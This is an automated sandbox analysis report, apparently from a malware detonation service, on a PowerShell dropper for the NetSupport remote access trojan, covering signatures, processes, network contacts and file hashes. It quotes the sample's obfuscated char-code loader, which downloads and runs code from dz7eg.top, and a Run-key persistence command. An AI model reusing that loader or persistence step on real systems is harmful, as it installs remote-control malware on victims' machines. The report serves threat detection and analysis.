Malware Analysis Report

2025-06-16 05:06

Sample ID 230530-vsf6rsah38
Target rt.php.ps1
SHA256 8347464802fc276d09848d28162f8802566f8795a07521c535c693fdfdaa4c3d
Tags
netsupport persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8347464802fc276d09848d28162f8802566f8795a07521c535c693fdfdaa4c3d

Threat Level: Known bad

The file rt.php.ps1 was found to be: Known bad.

Malicious Activity Summary

netsupport persistence rat

NetSupport

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Deletes itself

Adds Run key to start application

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-30 17:14

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-30 17:14

Reported

2023-05-30 17:45

Platform

win7-20230220-en

Max time kernel

1600s

Max time network

1602s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

Network

N/A

Files

memory/1676-58-0x000000001B1C0000-0x000000001B4A2000-memory.dmp

memory/1676-59-0x0000000002320000-0x0000000002328000-memory.dmp

memory/1676-60-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/1676-61-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/1676-62-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/1676-63-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/1676-64-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/1676-65-0x00000000024E0000-0x0000000002560000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2023-05-30 17:14

Reported

2023-05-30 17:45

Platform

win10v2004-20230220-en

Max time kernel

1552s

Max time network

1756s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

Signatures

NetSupport

rat netsupport

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExpirienceHost = "C:\\Users\\Admin\\AppData\\Roaming\\34dW5imkHZMP\\whost.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias rzs $([char]105+[char]110+[char]118+[char]111+[char]107+[char]101+[char]45+[char]101+[char]120+[char]112+[char]114+[char]101+[char]115+[char]115+[char]105+[char]111+[char]110);$global:block=(New-Object $([char]83+[char]121+[char]115+[char]116+[char]101+[char]109+[char]46+[char]78+[char]101+[char]116+[char]46+[char]87+[char]101+[char]98+[char]67+[char]108+[char]105+[char]101+[char]110+[char]116) ).($([char]68+[char]111+[char]119+[char]110+[char]108+[char]111+[char]97+[char]100+[char]83+[char]116+[char]114+[char]105+[char]110+[char]103) )($([char]104+[char]116+[char]116+[char]112+[char]58+[char]47+[char]47+[char]100+[char]122+[char]55+[char]101+[char]103+[char]46+[char]116+[char]111+[char]112+[char]47+[char]53+[char]49+[char]53+[char]47+[char]115+[char]100+[char]102+[char]122+[char]119+[char]46+[char]112+[char]104+[char]112+[char]63+[char]105+[char]61) +$(hostname));rzs $global:block

C:\Windows\system32\HOSTNAME.EXE

"C:\Windows\system32\HOSTNAME.EXE"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name ExpirienceHost -Value ""C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe""

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 dz7eg.top udp
US 143.244.162.145:80 dz7eg.top tcp
US 8.8.8.8:53 145.162.244.143.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 fduic.top udp
DE 167.235.159.22:443 fduic.top tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
GB 51.142.119.24:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 22.159.235.167.in-addr.arpa udp
US 8.8.8.8:53 24.119.142.51.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 40.125.122.151:443 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 20.42.65.85:443 tcp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
US 204.79.197.203:80 tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 2.36.159.162.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 233.141.123.20.in-addr.arpa udp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 8.8.8.8:53 112.208.253.8.in-addr.arpa udp
US 93.184.220.29:80 tcp
US 93.184.221.240:80 tcp
NL 173.223.113.131:80 tcp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 134.121.24.20.in-addr.arpa udp
US 8.8.8.8:53 191.94.239.20.in-addr.arpa udp
US 8.8.8.8:53 113.238.32.23.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_puvg0ve5.tfy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1908-141-0x000001B75E2D0000-0x000001B75E2F2000-memory.dmp

memory/1908-143-0x000001B745C00000-0x000001B745C10000-memory.dmp

memory/1908-144-0x000001B745C00000-0x000001B745C10000-memory.dmp

memory/1908-145-0x000001B745C00000-0x000001B745C10000-memory.dmp

memory/3384-155-0x000001379F770000-0x000001379F780000-memory.dmp

memory/3384-156-0x000001379F770000-0x000001379F780000-memory.dmp

memory/1908-160-0x000001B75EF10000-0x000001B75EF1A000-memory.dmp

memory/1908-161-0x000001B75F2A0000-0x000001B75F2B2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 75b4b2eecda41cec059c973abb1114c0
SHA1 11dadf4817ead21b0340ce529ee9bbd7f0422668
SHA256 5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134
SHA512 87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe

MD5 c0eb3eac96511077dafc0afa64c6388c
SHA1 33e81f25493eda3bbf0b7cdcddd523547fa6c31e
SHA256 eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a
SHA512 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe

MD5 c0eb3eac96511077dafc0afa64c6388c
SHA1 33e81f25493eda3bbf0b7cdcddd523547fa6c31e
SHA256 eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a
SHA512 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d6ca57a0b3d565156f3c053e1c0743b6
SHA1 bf9251134a1e54956fd943969588382917d7b2f6
SHA256 35f9a5113cfed3fe3df6f0d5ef92c573e70d4aadc61b556973974d3f90d0b855
SHA512 aa891c80594b815e065601891656cef0996a1f8507dadec3381b33cb479a5921877b94da08b88dba6b7b2b6e9628458b592969cd2e4d36ad295264244fe5790d

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\PCICL32.dll

MD5 00587238d16012152c2e951a087f2cc9
SHA1 c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA256 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\pcichek.dll

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\MSVCR100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\PCICHEK.DLL

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\pcicapi.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\pcicapi.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\PCICL32.DLL

MD5 00587238d16012152c2e951a087f2cc9
SHA1 c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA256 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\NSM.LIC

MD5 390c964070626a64888d385c514f568e
SHA1 a556209655dcb5e939fd404f57d199f2bb6da9b3
SHA256 ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54
SHA512 f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\client32.ini

MD5 5d2b788f10e973fce372fa2e4ececd4e
SHA1 40cc5404b896dd6ed657bba39ffdb6d63f45e9a1
SHA256 483b4c008ab680dd0958f5f09c55d6dc35f90fca1c3835fb864a1e8fcb598475
SHA512 168c7d962ab5b813e426eca03fd718c05a34d393b2fd79b3685fdcb408ae29399c4b6de8decfa893f039eb871425579cffdbf55465830a7801c065491c95ba20

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\HTCTL32.DLL

MD5 2d3b207c8a48148296156e5725426c7f
SHA1 ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256 edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\HTCTL32.DLL

MD5 2d3b207c8a48148296156e5725426c7f
SHA1 ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256 edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-30 17:14

Reported

2023-05-30 17:45

Platform

win10-20230220-en

Max time kernel

403s

Max time network

1758s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

Signatures

NetSupport

rat netsupport

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Windows\CurrentVersion\Run\ExpirienceHost = "C:\\Users\\Admin\\AppData\\Roaming\\f9Av6lBR2ENs\\whost.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias rzs $([char]105+[char]110+[char]118+[char]111+[char]107+[char]101+[char]45+[char]101+[char]120+[char]112+[char]114+[char]101+[char]115+[char]115+[char]105+[char]111+[char]110);$global:block=(New-Object $([char]83+[char]121+[char]115+[char]116+[char]101+[char]109+[char]46+[char]78+[char]101+[char]116+[char]46+[char]87+[char]101+[char]98+[char]67+[char]108+[char]105+[char]101+[char]110+[char]116) ).($([char]68+[char]111+[char]119+[char]110+[char]108+[char]111+[char]97+[char]100+[char]83+[char]116+[char]114+[char]105+[char]110+[char]103) )($([char]104+[char]116+[char]116+[char]112+[char]58+[char]47+[char]47+[char]100+[char]122+[char]55+[char]101+[char]103+[char]46+[char]116+[char]111+[char]112+[char]47+[char]53+[char]49+[char]53+[char]47+[char]115+[char]100+[char]102+[char]122+[char]119+[char]46+[char]112+[char]104+[char]112+[char]63+[char]105+[char]61) +$(hostname));rzs $global:block

C:\Windows\system32\HOSTNAME.EXE

"C:\Windows\system32\HOSTNAME.EXE"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name ExpirienceHost -Value ""C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe""

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 dz7eg.top udp
US 143.244.162.145:80 dz7eg.top tcp
US 8.8.8.8:53 145.162.244.143.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 fduic.top udp
DE 167.235.159.22:443 fduic.top tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
GB 62.172.138.67:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 22.159.235.167.in-addr.arpa udp
US 8.8.8.8:53 67.138.172.62.in-addr.arpa udp
JP 40.79.189.59:443 tcp
US 209.197.3.8:80 tcp
US 8.8.8.8:53 63.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 88.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 254.211.247.8.in-addr.arpa udp

Files

memory/1608-124-0x00000251AA7C0000-0x00000251AA7E2000-memory.dmp

memory/1608-127-0x00000251AA970000-0x00000251AA9E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bfemd1is.4ti.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1608-136-0x00000251908B0000-0x00000251908C0000-memory.dmp

memory/1608-137-0x00000251908B0000-0x00000251908C0000-memory.dmp

memory/1608-187-0x00000251908B0000-0x00000251908C0000-memory.dmp

memory/4760-189-0x000001FA76650000-0x000001FA76660000-memory.dmp

memory/4760-188-0x000001FA76650000-0x000001FA76660000-memory.dmp

memory/1608-190-0x00000251908B0000-0x00000251908C0000-memory.dmp

memory/4760-191-0x000001FA76650000-0x000001FA76660000-memory.dmp

memory/4760-200-0x000001FA76650000-0x000001FA76660000-memory.dmp

memory/1608-223-0x00000251AAF50000-0x00000251AAF5A000-memory.dmp

memory/1608-224-0x00000251AAF80000-0x00000251AAF92000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 56efdb5a0f10b5eece165de4f8c9d799
SHA1 fa5de7ca343b018c3bfeab692545eb544c244e16
SHA256 6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA512 91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 df1a4ff784a50670244eb782884af91f
SHA1 0dbcddbafcc416b4b35820d9ae83ee70f63f2d2a
SHA256 93445522a6ba5648bd6618ca3ef2a70ee0a767fe87dcb7450aa939860e90f1ae
SHA512 eb252587929d2538adc642b0d18c6c94a23a5949262ea11256b2d1b7c108c7f4f95bf66a7d9bfece81bff522c972191867ed44739d76ef5df43d032b53899593

memory/3684-270-0x000001866E890000-0x000001866E8A0000-memory.dmp

memory/3684-271-0x000001866E890000-0x000001866E8A0000-memory.dmp

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe

MD5 c0eb3eac96511077dafc0afa64c6388c
SHA1 33e81f25493eda3bbf0b7cdcddd523547fa6c31e
SHA256 eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a
SHA512 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2a93d653c9708e9b42505380eb60a1da
SHA1 abb42a825497e56c3006d53a48d776cc3ff8f5a9
SHA256 a91f1a988cf3729c94e1d0d0fda0d379462ae678c487e6d179f5ca1f4e1a948e
SHA512 44505d7ee19221379372155a26377ec1e7acc1c34823b0d8bd9e20379cc1e980ead4de8304e02dfe448ee5b642d94e47d7796eef1d13e6179b758217f3173013

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe

MD5 c0eb3eac96511077dafc0afa64c6388c
SHA1 33e81f25493eda3bbf0b7cdcddd523547fa6c31e
SHA256 eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a
SHA512 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\PCICL32.dll

MD5 00587238d16012152c2e951a087f2cc9
SHA1 c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA256 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\PCICL32.DLL

MD5 00587238d16012152c2e951a087f2cc9
SHA1 c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA256 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\PCICHEK.DLL

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\pcicapi.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\MSVCR100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\pcichek.dll

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\pcicapi.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\NSM.LIC

MD5 390c964070626a64888d385c514f568e
SHA1 a556209655dcb5e939fd404f57d199f2bb6da9b3
SHA256 ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54
SHA512 f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\client32.ini

